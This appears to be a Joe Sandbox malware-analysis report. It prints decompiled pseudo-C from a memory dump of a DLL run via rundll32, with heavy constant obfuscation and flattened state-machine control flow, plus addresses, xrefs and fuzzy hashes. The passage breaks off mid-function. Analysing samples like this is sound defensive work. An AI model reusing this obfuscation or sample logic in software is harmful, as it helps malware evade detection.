				_v596 = _v596 * 0x3e;
				_v596 = _v596 | 0x39de80ab;
				_v596 = _v596 + 0x6fd8;
				_v596 = _v596 ^ 0x39e00adb;
				_v548 = 0xf59e;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 ^ 0x00004a18;
				_v532 = 0xef88;
				_v532 = _v532 / _t262;
				_v532 = _v532 ^ 0x00005e97;
				_v580 = 0xce2c;
				_t263 = 0x1d;
				_v580 = _v580 * 0x38;
				_v580 = _v580 / _t263;
				_v580 = _v580 ^ 0x00019ca1;
				_v584 = 0xcb97;
				_t264 = 0x7c;
				_v584 = _v584 * 0x5a;
				_v584 = _v584 * 0x11;
				_v584 = _v584 ^ 0x04c0b349;
				_v592 = 0xb13f;
				_v592 = _v592 / _t264;
				_v592 = _v592 * 0x6b;
				_v592 = _v592 | 0xb06a3ec2;
				_v592 = _v592 ^ 0xb06acb10;
				do {
					while(_t223 != 0xd11567f) {
						if(_t223 == 0xdefeb70) {
							_push(0x10001000);
							_push(_v576);
							E100163BF(E1001BF25(_v552, _v528, __eflags), __eflags, _v604, _v536,  &_v524,  *0x100221b0 + 0x234, _v564,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v556);
							_t218 = E1001C5F7(_v568, _v540, _v600, _v544, _t215);
							_t272 = _t272 + 0x2c;
							_t223 = 0x285c1f68;
							continue;
						} else {
							if(_t223 == 0x10e191ba) {
								_t223 = 0xdefeb70;
								continue;
							} else {
								if(_t223 == 0x285c1f68) {
									_t218 = E10001E13(_v560, _v572, _v596, _v548,  &_v524);
									_t272 = _t272 + 0xc;
									 *_t218 = 0;
									_t223 = 0xd11567f;
									continue;
								}
							}
						}
						goto L9;
					}
					E10004EA1( &_v524, _v532, _v580, _v584,  &_v524, E10017570, _v592, 0);
					_t272 = _t272 + 0x18;
					_t223 = 0x1084920c;
					L9:
					__eflags = _t223 - 0x1084920c;
				} while (__eflags != 0);
				return _t218;
			}

0x100094f2
0x100094f8
0x10009502
0x10009507
0x10009515
0x10009519
0x10009521
0x10009529
0x10009531
0x10009539
0x10009541
0x1000954c
0x10009551
0x10009557
0x1000955f
0x10009567
0x1000956f
0x10009577
0x1000957f
0x10009587
0x1000958f
0x10009597
0x1000959f
0x100095a7
0x100095af
0x100095b7
0x100095bf
0x100095cc
0x100095cf
0x100095d3
0x100095db
0x100095e3
0x100095f0
0x100095f4
0x100095f9
0x10009601
0x10009611
0x10009615
0x1000961a
0x10009622
0x1000962e
0x10009633
0x10009639
0x10009641
0x10009649
0x10009652
0x10009655
0x10009659
0x10009661
0x10009669
0x10009671
0x10009679
0x10009681
0x10009689
0x10009691
0x10009699
0x100096a1
0x100096a9
0x100096b6
0x100096bc
0x100096c9
0x100096e2
0x100096e5
0x100096e9
0x100096f1
0x100096f9
0x10009701
0x10009709
0x1000970e
0x10009716
0x10009726
0x1000972a
0x10009732
0x1000973f
0x10009742
0x1000974e
0x10009752
0x1000975a
0x10009767
0x10009768
0x10009771
0x10009775
0x1000977d
0x1000978b
0x10009794
0x10009798
0x100097a0
0x100097a8
0x100097a8
0x100097b2
0x100097f2
0x100097f7
0x10009839
0x1000984f
0x10009854
0x10009857
0x00000000
0x100097b4
0x100097ba
0x100097ee
0x00000000
0x100097bc
0x100097c2
0x100097dd
0x100097e2
0x100097e7
0x100097ea
0x00000000
0x100097ea
0x100097c2
0x100097ba
0x00000000
0x100097b2
0x1000987f
0x10009884
0x10009887
0x10009889
0x10009889
0x10009889
0x10009898

Strings

V8, xrefs: 10009639
,, xrefs: 10009669
p, xrefs: 100096D1
-T, xrefs: 1000957F

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,$-T$V8$p
API String ID: 0-3916372523
Opcode ID: fe2cff7067093b2d558a9cecacae9b5ad41a5273b9a4ffd5d244425a66effca3
Instruction ID: 69ffcb7ec9cb319a1ce736737d15c81d771b3a6a0237c0b4041a3b002347b657
Opcode Fuzzy Hash: fe2cff7067093b2d558a9cecacae9b5ad41a5273b9a4ffd5d244425a66effca3
Instruction Fuzzy Hash: 80A130711093419FE358CF26C98680BFBF1FBC5758F40891DF6A69A2A0D3B599098F82

Uniqueness

Uniqueness Score: -1.00%

Function 100177C0, Relevance: 5.1, Strings: 4, Instructions: 142
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E100177C0(signed int __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				intOrPtr _t112;
				intOrPtr _t115;
				signed int _t117;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				void* _t124;
				signed int _t136;
				void* _t137;
				signed int _t140;
				intOrPtr* _t143;
				signed int* _t144;

				_t144 =  &_v564;
				_v532 = 0x1772;
				_v532 = _v532 * 0x5a;
				_t143 = __edx;
				_v532 = _v532 >> 9;
				_v532 = _v532 ^ 0x00005570;
				_t120 = __ecx;
				_v536 = 0xd4de;
				_t137 = 0xee39a7c;
				_v536 = _v536 + 0xf33a;
				_v536 = _v536 ^ 0x38a2f836;
				_v536 = _v536 ^ 0x38a37f8b;
				_v548 = 0x7513;
				_v548 = _v548 | 0x052e2a6a;
				_v548 = _v548 ^ 0x1a009472;
				_v548 = _v548 ^ 0x1f2ec1f2;
				_v524 = 0xa699;
				_v524 = _v524 ^ 0x09ca44e2;
				_v524 = _v524 ^ 0x09cad658;
				_v564 = 0x9128;
				_v564 = _v564 >> 2;
				_v564 = _v564 << 9;
				_v564 = _v564 | 0x50e7f59d;
				_v564 = _v564 ^ 0x50ef90e4;
				_v556 = 0x80f2;
				_v556 = _v556 >> 0xb;
				_v556 = _v556 ^ 0x31791c1d;
				_v556 = _v556 + 0x8ae1;
				_v556 = _v556 ^ 0x3179d51e;
				_v540 = 0x4387;
				_t122 = 0x3f;
				_v540 = _v540 / _t122;
				_v540 = _v540 ^ 0x58e2e29e;
				_v540 = _v540 ^ 0x58e2cc49;
				_v552 = 0xa082;
				_v552 = _v552 ^ 0xcad17016;
				_v552 = _v552 + 0xffff4873;
				_v552 = _v552 ^ 0x78230127;
				_v552 = _v552 ^ 0xb2f23b2e;
				_v528 = 0x3f9f;
				_t123 = 0x42;
				_v528 = _v528 / _t123;
				_v528 = _v528 ^ 0x00000484;
				_t136 = _v528;
				_v560 = 0x7d41;
				_v560 = _v560 << 4;
				_v560 = _v560 * 0x2b;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 ^ 0x00006e49;
				_v544 = 0x2431;
				_v544 = _v544 ^ 0x7eed52f8;
				_v544 = _v544 | 0x8f6fe496;
				_v544 = _v544 ^ 0xffefc65f;
				while(_t137 != 0x5fcbc3f) {
					if(_t137 != 0xee39a7c) {
						if(_t137 == 0x11ea9c68) {
							_push( &_v520);
							_t117 = E10002628(_t120, _t143);
							asm("sbb esi, esi");
							_t123 = 0x10001318;
							_t140 =  ~_t117 & 0x1fda4e6f;
							goto L7;
						} else {
							if(_t137 == 0x1790ebe1) {
								return E100091CD(_v552, _v528, _v560, _t136, _v544);
							}
							_t151 = _t137 - 0x376b3a50;
							if(_t137 != 0x376b3a50) {
								L12:
								__eflags = _t137 - 0x7fc7711;
								if(__eflags != 0) {
									continue;
								} else {
									return _t117;
								}
								L16:
							} else {
								_push(_v540);
								_push(0);
								_push(0);
								_push(_t123);
								_push(_v556);
								_push(_v564);
								_t123 = _v548;
								_push( &_v520);
								_push(0);
								_t117 = E100189F6(_t123, _v524, _t151);
								_t144 =  &(_t144[8]);
								asm("sbb esi, esi");
								_t140 =  ~_t117 & 0xee6bd05e;
								L7:
								_t137 = _t140 + 0x1790ebe1;
								continue;
							}
						}
					}
					_t124 = 0x24;
					_t115 = E100157E8(_t124);
					_t136 = _t115;
					_t123 = _t123;
					__eflags = _t136;
					if(__eflags != 0) {
						_t137 = 0x11ea9c68;
						continue;
					}
					return _t115;
					goto L16;
				}
				 *((intOrPtr*)(_t136 + 0x20)) = _t120;
				_t137 = 0x7fc7711;
				_t112 =  *0x10021400; // 0x0
				 *((intOrPtr*)(_t136 + 0x10)) = _t112;
				 *0x10021400 = _t136;
				goto L12;
			}

0x100177c0
0x100177c6
0x100177d7
0x100177db
0x100177dd
0x100177e4
0x100177ec
0x100177ee
0x100177f6
0x100177fb
0x10017803
0x1001780b
0x10017813
0x1001781b
0x10017823
0x1001782b
0x10017833
0x1001783b
0x10017843
0x1001784b
0x10017853
0x10017858
0x1001785d
0x10017865
0x1001786d
0x10017875
0x1001787a
0x10017882
0x1001788a
0x10017892
0x100178a0
0x100178a5
0x100178ab
0x100178b3
0x100178bb
0x100178c3
0x100178cb
0x100178d3
0x100178db
0x100178e3
0x100178ef
0x100178f2
0x100178f6
0x100178fe
0x10017902
0x1001790a
0x10017914
0x10017918
0x1001791d
0x10017925
0x1001792d
0x10017935
0x1001793d
0x10017945
0x10017957
0x1001795f
0x100179bb
0x100179c3
0x100179cd
0x100179cf
0x100179d0
0x00000000
0x10017961
0x10017967
0x00000000
0x10017a34
0x1001796d
0x10017973
0x10017a10
0x10017a10
0x10017a16
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10017979
0x10017979
0x10017981
0x10017983
0x10017985
0x10017986
0x1001798a
0x10017992
0x10017996
0x10017997
0x10017999
0x1001799e
0x100179a5
0x100179a7
0x100179ad
0x100179ad
0x00000000
0x100179ad
0x10017973
0x1001795f
0x100179e3
0x100179e4
0x100179e9
0x100179eb
0x100179ec
0x100179ee
0x100179f0
0x00000000
0x100179f0
0x10017a41
0x00000000
0x10017a41
0x100179fa
0x100179fd
0x10017a02
0x10017a07
0x10017a0a
0x00000000

Strings

pU, xrefs: 100177E4
P:k7, xrefs: 1001796D
1$, xrefs: 10017925
In, xrefs: 1001791D

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1$$In$P:k7$pU
API String ID: 0-2106264963
Opcode ID: a6b8b6057752e44647db78beeb2ee1f3202c3f20c0f29efe6dfe5a7aead6b88d
Instruction ID: 2e7f08dc6bef0bd5653fe598f332924a89a4fdabe7864c0509b3b532d9c0389b
Opcode Fuzzy Hash: a6b8b6057752e44647db78beeb2ee1f3202c3f20c0f29efe6dfe5a7aead6b88d
Instruction Fuzzy Hash: D2516B719083419BD358DF21D48694BBBF0FBC8758F501A1DF9DAAA260C3B4DA49CB87

Uniqueness

Uniqueness Score: -1.00%

Function 1001DEE8, Relevance: 5.1, Strings: 4, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E1001DEE8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				void* _t134;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t134);
				_v56 = _v56 & 0x00000000;
				_v60 = 0x429fa3;
				_v16 = 0x8df8;
				_v16 = _v16 | 0x5bad6fdd;
				_v16 = _v16 ^ 0x1c317be5;
				_v16 = _v16 ^ 0x479cc3d4;
				_v12 = 0xa64d;
				_t151 = 0x35;
				_v12 = _v12 / _t151;
				_v12 = _v12 + 0xfffff8cf;
				_v12 = _v12 | 0x0b89d292;
				_v12 = _v12 ^ 0xffff912a;
				_v8 = 0x343c;
				_v8 = _v8 + 0xdfbd;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x831c11fe;
				_v8 = _v8 ^ 0x831c1bf9;
				_v20 = 0xd2ea;
				_v20 = _v20 << 0xb;
				_v20 = _v20 + 0xffff01f9;
				_t152 = 0x3f;
				_v20 = _v20 / _t152;
				_v20 = _v20 ^ 0x001a8b92;
				_v52 = 0xabad;
				_v52 = _v52 ^ 0xf345eb5d;
				_v52 = _v52 ^ 0xf3453027;
				_v40 = 0x2a5b;
				_v40 = _v40 ^ 0x8a944271;
				_v40 = _v40 + 0xffff3ddd;
				_v40 = _v40 ^ 0x8a93ae26;
				_v36 = 0xa033;
				_t153 = 0x2a;
				_v36 = _v36 / _t153;
				_v36 = _v36 >> 7;
				_v36 = _v36 ^ 0x000061ee;
				_v32 = 0x8be0;
				_v32 = _v32 | 0xe631180e;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x19bef193;
				_v48 = 0xa7b3;
				_t154 = 0x44;
				_v48 = _v48 * 0x60;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0xb8c85214;
				_v28 = 0x762;
				_v28 = _v28 | 0x9c151205;
				_v28 = _v28 << 8;
				_v28 = _v28 >> 8;
				_v28 = _v28 ^ 0x0015065a;
				_v44 = 0x58a5;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 / _t154;
				_v44 = _v44 ^ 0x00007339;
				_v24 = 0xfaea;
				_v24 = _v24 << 3;
				_v24 = _v24 + 0xd2b0;
				_t155 = 3;
				_push(0x100015c0);
				_v24 = _v24 / _t155;
				_v24 = _v24 ^ 0x00028589;
				_push(_v8);
				E100163BF(E1001BF25(_v16, _v12, _v24), _v24, _v52, _v40, __edx, _v16, _v36, _a12, _a8, _v32);
				return E1001C5F7(_v48, _v28, _v44, _v24, _t147);
			}

0x1001def0
0x1001def5
0x1001def8
0x1001defb
0x1001defe
0x1001deff
0x1001df00
0x1001df05
0x1001df0b
0x1001df12
0x1001df19
0x1001df20
0x1001df27
0x1001df2e
0x1001df3a
0x1001df3f
0x1001df44
0x1001df4b
0x1001df52
0x1001df59
0x1001df60
0x1001df67
0x1001df6b
0x1001df72
0x1001df79
0x1001df80
0x1001df84
0x1001df8e
0x1001df93
0x1001df98
0x1001df9f
0x1001dfa6
0x1001dfad
0x1001dfb4
0x1001dfbb
0x1001dfc2
0x1001dfc9
0x1001dfd0
0x1001dfda
0x1001dfdf
0x1001dfe4
0x1001dfe8
0x1001dfef
0x1001dff6
0x1001dffd
0x1001e001
0x1001e008
0x1001e013
0x1001e014
0x1001e017
0x1001e01b
0x1001e022
0x1001e029
0x1001e030
0x1001e034
0x1001e038
0x1001e03f
0x1001e046
0x1001e04f
0x1001e052
0x1001e059
0x1001e060
0x1001e066
0x1001e072
0x1001e075
0x1001e07a
0x1001e07d
0x1001e084
0x1001e0b0
0x1001e0cf

Strings

a, xrefs: 1001DFE8
9s, xrefs: 1001E052
<4, xrefs: 1001DF59
[*, xrefs: 1001DFB4

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 9s$<4$[*$a
API String ID: 0-239331953
Opcode ID: d0e58df00b0c86ff922bd6907dfca745df99386b0e2c539687ea4503f84d7d05
Instruction ID: 5a9fb4e3a59909fd41fb50e737628130f046b5500317e57dd636ad6f2bf099bc
Opcode Fuzzy Hash: d0e58df00b0c86ff922bd6907dfca745df99386b0e2c539687ea4503f84d7d05
Instruction Fuzzy Hash: 06512571D00219EBDF08CFE5D94A8DEBBB2FB48314F208119E521B62A0D7B95A55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 100199A4, Relevance: 4.0, Strings: 3, Instructions: 263
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E100199A4() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				short _t279;
				short _t282;
				void* _t290;
				void* _t291;
				void* _t315;
				short* _t316;
				void* _t317;
				short* _t318;
				short* _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t329;

				_v88 = 0x9528;
				_t315 =  *0x100221b0 + 0x10;
				_v88 = _v88 << 0x10;
				_t291 = 0x29b6ea94;
				_v88 = _v88 ^ 0x95285eaa;
				_v84 = 0xe890;
				_t320 = 0x34;
				_v84 = _v84 * 0x1f;
				_v84 = _v84 ^ 0x001c45a3;
				_v28 = 0x9112;
				_v28 = _v28 / _t320;
				_t321 = 0x19;
				_v28 = _v28 * 0x31;
				_v28 = _v28 << 0xc;
				_v28 = _v28 ^ 0x088a98e7;
				_v52 = 0xda31;
				_v52 = _v52 >> 8;
				_v52 = _v52 << 4;
				_v52 = _v52 ^ 0x000066fb;
				_v24 = 0xe82b;
				_v24 = _v24 ^ 0xb4fe6801;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 | 0xa81c026a;
				_v24 = _v24 ^ 0xa83d3e65;
				_v20 = 0x6909;
				_v20 = _v20 + 0xffffc42e;
				_v20 = _v20 << 0xd;
				_v20 = _v20 / _t321;
				_v20 = _v20 ^ 0x0039e32c;
				_v60 = 0xab82;
				_v60 = _v60 + 0xffff0bd3;
				_t322 = 0xf;
				_v60 = _v60 * 0x76;
				_v60 = _v60 ^ 0xffdec8c4;
				_v56 = 0x5e59;
				_v56 = _v56 / _t322;
				_v56 = _v56 >> 0xb;
				_v56 = _v56 ^ 0x00001434;
				_v96 = 0x977a;
				_t323 = 0x6f;
				_v96 = _v96 * 0x61;
				_v96 = _v96 ^ 0x00397eb3;
				_v92 = 0xa291;
				_v92 = _v92 | 0x42e1adc5;
				_v92 = _v92 ^ 0x42e1b77e;
				_v40 = 0x73d4;
				_v40 = _v40 / _t323;
				_v40 = _v40 << 1;
				_v40 = _v40 * 0x4a;
				_v40 = _v40 ^ 0x0000cc60;
				_v36 = 0x33bd;
				_v36 = _v36 >> 5;
				_v36 = _v36 ^ 0xc340ad00;
				_v36 = _v36 << 0xb;
				_v36 = _v36 ^ 0x0564fa7a;
				_v64 = 0xc60;
				_v64 = _v64 | 0x04416794;
				_t324 = 0x5f;
				_v64 = _v64 * 0xd;
				_v64 = _v64 ^ 0x3752d4dc;
				_v32 = 0xae9f;
				_v32 = _v32 + 0x24a;
				_v32 = _v32 + 0xffffd123;
				_t325 = 0x3d;
				_v32 = _v32 / _t324;
				_v32 = _v32 ^ 0x0000400c;
				_v72 = 0x4f8e;
				_v72 = _v72 << 0xb;
				_v72 = _v72 ^ 0x027c6373;
				_v12 = 0x21f4;
				_v12 = _v12 + 0x1717;
				_v12 = _v12 * 0x19;
				_v12 = _v12 + 0xffff4c52;
				_v12 = _v12 ^ 0x00049658;
				_v8 = 0xd7dc;
				_v8 = _v8 ^ 0x4ae28678;
				_v8 = _v8 * 0x67;
				_v8 = _v8 + 0xffff8b2b;
				_v8 = _v8 ^ 0x210e6813;
				_v44 = 0x10ca;
				_v44 = _v44 * 0xe;
				_v44 = _v44 ^ 0x21d1d5f5;
				_v44 = _v44 ^ 0x21d123f7;
				_v48 = 0xfc7c;
				_v48 = _v48 ^ 0x12e29e7b;
				_v48 = _v48 ^ 0x780ab142;
				_v48 = _v48 ^ 0x6ae8c2ee;
				_v80 = 0x56f;
				_t326 = 0x77;
				_v80 = _v80 / _t325;
				_v80 = _v80 ^ 0x0000686a;
				_v16 = 0x940a;
				_v16 = _v16 ^ 0x3241511d;
				_v16 = _v16 << 2;
				_v16 = _v16 | 0x2c0ae0b9;
				_v16 = _v16 ^ 0xed0fff5b;
				_v76 = 0xb74;
				_v76 = _v76 | 0xff1ac2c7;
				_v76 = _v76 ^ 0xff1aa207;
				_v108 = 0xf16f;
				_v108 = _v108 + 0xffff55fa;
				_v108 = _v108 ^ 0x00000b68;
				_v104 = 0x7f0f;
				_v104 = _v104 / _t326;
				_v104 = _v104 ^ 0x00004c16;
				_v68 = 0xc425;
				_v68 = _v68 << 0xf;
				_v68 = _v68 | 0xc23afe3b;
				_v68 = _v68 ^ 0xe23ab7b9;
				_v100 = 0xccd6;
				_v100 = _v100 | 0x04b2265a;
				_v100 = _v100 ^ 0x04b29fa8;
				_t290 = 2;
				do {
					while(_t291 != 0x2226ace9) {
						if(_t291 == 0x2622bc84) {
							_push(_t291);
							_t327 = E1000607F(_t291, __eflags, _t291, 0x10, 4);
							E1000D940(_t315, _v56, _v96, _v92, _t290,  &_v112, 1);
							_t317 = _t315 + _t290;
							E1000D940(_t317, _v36, _v64, _v32, 1,  &_v112, _t327);
							_t329 = _t329 + 0x40;
							_t318 = _t317 + _t327 * 2;
							_t291 = 0x29e4095b;
							_t279 = 0x5c;
							 *_t318 = _t279;
							_t315 = _t318 + _t290;
							continue;
						} else {
							if(_t291 == 0x29b6ea94) {
								_t282 = E10017B6B();
								_v112 = _t282;
								_t291 = 0x2622bc84;
								continue;
							} else {
								_t334 = _t291 - 0x29e4095b;
								if(_t291 == 0x29e4095b) {
									_push(_t291);
									_t328 = E1000607F(_t291, _t334, _t291, 0x10, 4);
									E1000D940(_t315, _v80, _v16, _v76, 1,  &_v112, _t328);
									_t329 = _t329 + 0x28;
									_t319 = _t315 + _t328 * 2;
									_t291 = 0x2226ace9;
									_t282 = 0x2e;
									 *_t319 = _t282;
									_t315 = _t319 + _t290;
									continue;
								}
							}
						}
						goto L9;
					}
					E1000D940(_t315, _v104, _v68, _v100, 1,  &_v112, 3);
					_t316 = _t315 + 6;
					_t329 = _t329 + 0x18;
					_t291 = 0x2b0037fd;
					 *_t316 = 0;
					_t315 = _t316 + _t290;
					__eflags = _t315;
					L9:
					__eflags = _t291 - 0x2b0037fd;
				} while (__eflags != 0);
				return _t282;
			}

0x100199b5
0x100199bc
0x100199bf
0x100199c3
0x100199c8
0x100199cf
0x100199dc
0x100199df
0x100199e2
0x100199e9
0x100199f7
0x100199fe
0x10019a01
0x10019a04
0x10019a08
0x10019a0f
0x10019a16
0x10019a1a
0x10019a1e
0x10019a25
0x10019a2c
0x10019a33
0x10019a37
0x10019a3e
0x10019a45
0x10019a4c
0x10019a53
0x10019a5e
0x10019a61
0x10019a68
0x10019a6f
0x10019a7a
0x10019a7d
0x10019a80
0x10019a87
0x10019a95
0x10019a98
0x10019a9c
0x10019aa3
0x10019aae
0x10019aaf
0x10019ab2
0x10019ab9
0x10019ac0
0x10019ac7
0x10019ace
0x10019ada
0x10019add
0x10019ae4
0x10019ae7
0x10019aee
0x10019af5
0x10019af9
0x10019b00
0x10019b04
0x10019b0b
0x10019b12
0x10019b21
0x10019b24
0x10019b27
0x10019b2e
0x10019b35
0x10019b3c
0x10019b48
0x10019b49
0x10019b4e
0x10019b55
0x10019b5c
0x10019b60
0x10019b67
0x10019b6e
0x10019b7b
0x10019b7e
0x10019b85
0x10019b8c
0x10019b93
0x10019b9e
0x10019ba1
0x10019ba8
0x10019baf
0x10019bba
0x10019bbd
0x10019bc4
0x10019bcb
0x10019bd2
0x10019bd9
0x10019be0
0x10019be7
0x10019bf3
0x10019bf4
0x10019bf9
0x10019c00
0x10019c07
0x10019c0e
0x10019c12
0x10019c19
0x10019c20
0x10019c27
0x10019c2e
0x10019c35
0x10019c3c
0x10019c43
0x10019c4a
0x10019c58
0x10019c5b
0x10019c62
0x10019c69
0x10019c6d
0x10019c74
0x10019c7b
0x10019c82
0x10019c89
0x10019c90
0x10019c91
0x10019c91
0x10019ca3
0x10019d25
0x10019d32
0x10019d47
0x10019d50
0x10019d63
0x10019d68
0x10019d6b
0x10019d6e
0x10019d75
0x10019d76
0x10019d79
0x00000000
0x10019ca5
0x10019cab
0x10019d07
0x10019d0c
0x10019d0f
0x00000000
0x10019cad
0x10019cad
0x10019cb3
0x10019cc5
0x10019cd0
0x10019ce7
0x10019cec
0x10019cef
0x10019cf2
0x10019cf9
0x10019cfa
0x10019cfd
0x00000000
0x10019cfd
0x10019cb3
0x10019cab
0x00000000
0x10019ca3
0x10019d96
0x10019d9b
0x10019da0
0x10019da3
0x10019da8
0x10019dab
0x10019dab
0x10019dad
0x10019dad
0x10019dad
0x10019dbf

Strings

[), xrefs: 10019D6E
,9, xrefs: 10019A61
[), xrefs: 10019CAD

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,9$[)$[)
API String ID: 0-3362820381
Opcode ID: 603117b8363adce16010609699c3a886c8196d66e76f24d38a98b26cfbd9f97d
Instruction ID: 44abcb00151ec1b00a79a92a733cf4ca5547ce6a62ffc74197264c17b034da66
Opcode Fuzzy Hash: 603117b8363adce16010609699c3a886c8196d66e76f24d38a98b26cfbd9f97d
Instruction Fuzzy Hash: 2AC13475D00309DBEB18CFE5D98A9DEBBB6FB44304F208119E116BB2A4C3B55A46CF40

Uniqueness

Uniqueness Score: -1.00%

Function 1000D0DE, Relevance: 3.9, Strings: 3, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E1000D0DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t133;
				void* _t144;
				signed int _t153;
				signed int _t154;
				void* _t157;
				void* _t169;
				void* _t170;
				signed int* _t173;

				_push(_a16);
				_t169 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t133);
				_v48 = 0x5a8b;
				_t173 =  &(( &_v60)[6]);
				_v48 = _v48 ^ 0x4360b52a;
				_v48 = _v48 ^ 0x1a806351;
				_t170 = 0;
				_v48 = _v48 >> 2;
				_t157 = 0x13068ceb;
				_v48 = _v48 ^ 0x1678233d;
				_v8 = 0x8630;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x00000862;
				_v52 = 0x326b;
				_v52 = _v52 >> 1;
				_v52 = _v52 | 0xc7f7cfdb;
				_v52 = _v52 ^ 0x87f7dfff;
				_v12 = 0x4e1;
				_v12 = _v12 | 0x6d92ca4a;
				_v12 = _v12 ^ 0x2d92ceeb;
				_v28 = 0xfb25;
				_v28 = _v28 | 0x71bf14c1;
				_v28 = _v28 << 8;
				_v28 = _v28 ^ 0xbfffdb80;
				_v32 = 0xf237;
				_v32 = _v32 >> 4;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x000074ee;
				_v36 = 0xcd16;
				_t153 = 0x3c;
				_v36 = _v36 * 0x44;
				_v36 = _v36 ^ 0x3fdc784b;
				_v36 = _v36 ^ 0x3fea737c;
				_v20 = 0xb3fe;
				_v20 = _v20 >> 7;
				_v20 = _v20 ^ 0x00007694;
				_v56 = 0xdd00;
				_v56 = _v56 * 0x23;
				_v56 = _v56 + 0xffff9337;
				_v56 = _v56 << 7;
				_v56 = _v56 ^ 0x0ee528fc;
				_v60 = 0xf711;
				_v60 = _v60 >> 4;
				_v60 = _v60 | 0x4989a590;
				_v60 = _v60 + 0xffff6a05;
				_v60 = _v60 ^ 0x49891a0f;
				_v40 = 0x92cf;
				_v40 = _v40 ^ 0xf586a06e;
				_v40 = _v40 + 0xffff6eef;
				_v40 = _v40 << 0xd;
				_v40 = _v40 ^ 0xb4326dcb;
				_v44 = 0x65dd;
				_v44 = _v44 / _t153;
				_v44 = _v44 << 6;
				_v44 = _v44 + 0xffff872c;
				_v44 = _v44 ^ 0xffffb82a;
				_v16 = 0xf090;
				_t154 = 0x21;
				_v16 = _v16 / _t154;
				_v16 = _v16 ^ 0x00005a72;
				_v24 = 0xb1df;
				_v24 = _v24 * 6;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x08564d31;
				while(_t157 != 0x13068ceb) {
					if(_t157 == 0x32a00bf2) {
						_t144 = E1001551E(_a16,  &_v4, _v28, _t169, 0, _v52 | _v48, _v32, _v36, _v20);
						_t173 =  &(_t173[7]);
						if(_t144 != 0) {
							_t157 = 0x39bb1850;
							continue;
						}
					} else {
						if(_t157 == 0x367d931e) {
